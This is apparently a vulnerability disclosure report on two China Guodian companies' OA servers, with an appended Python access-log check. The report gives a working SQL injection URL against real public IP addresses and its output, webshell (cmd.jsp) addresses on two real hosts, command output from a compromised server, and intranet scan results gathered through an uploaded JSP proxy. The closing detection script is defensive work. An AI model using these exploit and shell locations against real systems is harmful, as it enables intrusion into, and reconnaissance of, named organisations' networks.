SQL injection at two China Guodian companies leads to getshell; patches need to be applied (intranet security involved)
Intranet Security
http://60.13.13.239:8080/yyoa/
http://60.13.13.239:8080/yyoa/common/js/menu/test.jsp?DoType=101&S1=select%20database()
No.  @@basedir
1    D:\Program Files\UFseeyon\OA\mysql\bin\..\
For details of the getshell method, see
WooYun: A bloody case (getshell) caused by a neglected vulnerability at an Eastern Airlines media company
Get shell
http://60.13.13.239:8080/yyoa/wel.jsp
http://60.13.13.239:8080/yyoa/cmd.jsp
ipconfig
Local Connection of the Ethernet Adapter:
   Connection to a specific DNS suffix . . . :
   Local IPv6 address . . . . . . . . . . . : fe80::50fc:d4c8:8aee:b822%11
   IPv4 address . . . . . . . . . . . . . . : 10.100.130.5
   Subnet mask . . . . . . . . . . . . . . . : 255.255.255.0
   Default gateway . . . . . . . . . . . . . : 10.100.130.254
A JSP proxy was uploaded to scan the intranet:
http://10.100.130.4 >> >>Apache-Coyote/1.1 >>Success
http://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.6 >> ???>>Apache >>Success
http://10.100.130.101 >> ???>>Apache >>Success
http://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
http://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
Some internal document information and logs
http://222.89.154.134:8080/yyoa/
Shell address:
http://222.89.154.134:8080/yyoa/cmd.jsp
Solution:
Upgrade programs and install patches
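Alongside patching, the web server access log shows whether the test.jsp endpoint from this report was already requested with SQL in S1, and whether JSP files outside the shipped set were served from the application root. The Python check below is an added example, not part of the original report; the log format, sample lines, addresses, dates and the ROOT_JSP_BASELINE set are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in common log format (addresses are documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2015:10:00:01 +0800] "GET /yyoa/common/js/menu/test.jsp?DoType=101&S1=select%20database() HTTP/1.1" 200 312
203.0.113.7 - - [01/Jan/2015:10:02:10 +0800] "GET /yyoa/cmd.jsp HTTP/1.1" 200 1024
198.51.100.20 - - [01/Jan/2015:10:03:00 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 5120
198.51.100.21 - - [01/Jan/2015:10:04:00 +0800] "GET /yyoa/common/js/menu/menu.js HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SQL_RE = re.compile(
    r"\b(select|union|insert|update|delete|load_file|into\s+(?:out|dump)file)\b", re.I)
TEST_JSP = "/yyoa/common/js/menu/test.jsp"
# Assumption: JSPs a clean install serves from the application root. Build the
# real baseline from the vendor package; this set is only a placeholder.
ROOT_JSP_BASELINE = {"index.jsp"}

def classify(line):
    """Return (source, timestamp, target, findings) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, ts, _method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    # Parameter names are compared case-insensitively; values are URL-decoded.
    params = {k.lower(): v for k, v in parse_qs(url.query).items()}
    findings = []
    if path == TEST_JSP:
        s1 = " ".join(params.get("s1", []))
        findings.append("sql-in-S1" if SQL_RE.search(s1) else "test-jsp-access")
    root = re.fullmatch(r"/yyoa/([^/]+\.jsp)", path)
    if root and root.group(1) not in ROOT_JSP_BASELINE and status == "200":
        findings.append("unbaselined-root-jsp")
    return (src, ts, target, findings) if findings else None

def scan(log_text):
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for src, ts, target, findings in scan(SAMPLE_LOG):
        print(ts, src, ",".join(findings), target)
```

Access logs record only the request line, so parameters sent in a POST body are not visible to this check; a hit on test.jsp with no query string still deserves a look.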